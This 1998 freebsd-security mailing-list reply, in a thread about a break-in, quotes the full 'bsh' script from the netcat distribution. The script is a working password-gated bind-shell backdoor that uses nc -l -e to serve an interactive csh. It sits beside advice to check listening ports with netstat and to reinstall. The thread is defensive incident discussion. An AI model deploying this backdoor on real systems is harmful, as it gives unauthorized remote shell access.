From owner-freebsd-security Thu Aug 27 20:24:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA07862 for freebsd-security-outgoing; Thu, 27 Aug 1998 20:24:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA07804 for ; Thu, 27 Aug 1998 20:24:01 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id UAA13916; Thu, 27 Aug 1998 20:21:41 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Thu, 27 Aug 1998 20:21:41 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: "Timothy R. Platt" cc: security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ugh.. you are right. I was thinking of bsh (I guess they both start with b FWIW). 0wn# pwd /usr/home/jkb/nc/scripts 0wn# cat bsh #! /bin/sh ## a little wrapper to "password" and re-launch a shell-listener. ## Arg is taken as the port to listen on. Define "NC" to point wherever. NC=nc case "$1" in ?* ) LPN="$1" export LPN sleep 1 echo "-l -p $LPN -e $0" | $NC > /dev/null 2>&1 & echo "launched on port $LPN" exit 0 ;; esac # here we play inetd echo "-l -p $LPN -e $0" | $NC > /dev/null 2>&1 & while read qq ; do case "$qq" in # here's yer password gimme ) cd / exec csh -i ;; esac done -- Yan www.best.com/~jkb/ Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com "Turn up the lights, I don't want to go home in the dark." On Thu, 27 Aug 1998, Timothy R. Platt wrote: >Huh? From the bnc distribution README (bnc is in the FreeBSD ports >collection, btw): > >1.INTRODUCTION > BNC is a simple program designed to Proxy irc sessions. > It is user configurable using the file bnc.conf and includes > NOW INCLUDES VIRTUAL HOSTS!!! ;P > >2.COMPILATION > I would tell you how to un-tar/gz this file, but your > reading this so why would you need help :-) > To compile bnc simply type: > make > >3.CONFIGURATION > The configuration file give BNC the nessesary info to > process such as the port to bind to and what port to request > when a conn is requested, also passwords and maxusers. > >4.LOADING > type: > bnc > >5.CLIENT SIDE > When using various clients you connect to the server in > which the daemon is ran. In ircii and other clients you will > have to give your password by typing /quote pass to > continue, in Mirc you can simply /server bnc.server.net port pass > to connect. Once your pass is ok'ed you can tell it to connect > to an irc server by typing /quote conn [irc.server.net] . > > added /quote VIP [Virtual.host] for on the fly ip switching. It must > be done before you /quote conn. > > >6.GNU > Yeah you know how this works so just realize this is gnu. > > multi-user, passwords, and other basic necessities. [humiliating stuff sniped] > > >This is the only bnc I've seen.. > >Tim > > >> Arggh! I just remembered. Gary is correct If you download netcat >>it comes with some scripts, bnc is one of them. It will listen on a port >>and upon connect will drop you in to shell as root. Please do: >> >># netstat -an | grep LIST >> >>and check to make sure you know what all the ports are. If I'd be you I'd >>re-install since who knows what you at going with crontab, at, mail >>aliases, etc. >> >>-- Yan >> >>www.best.com/~jkb/ Unix users of the world unite: >>www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com >>"Turn up the lights, I don't want to go home in the dark." >> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message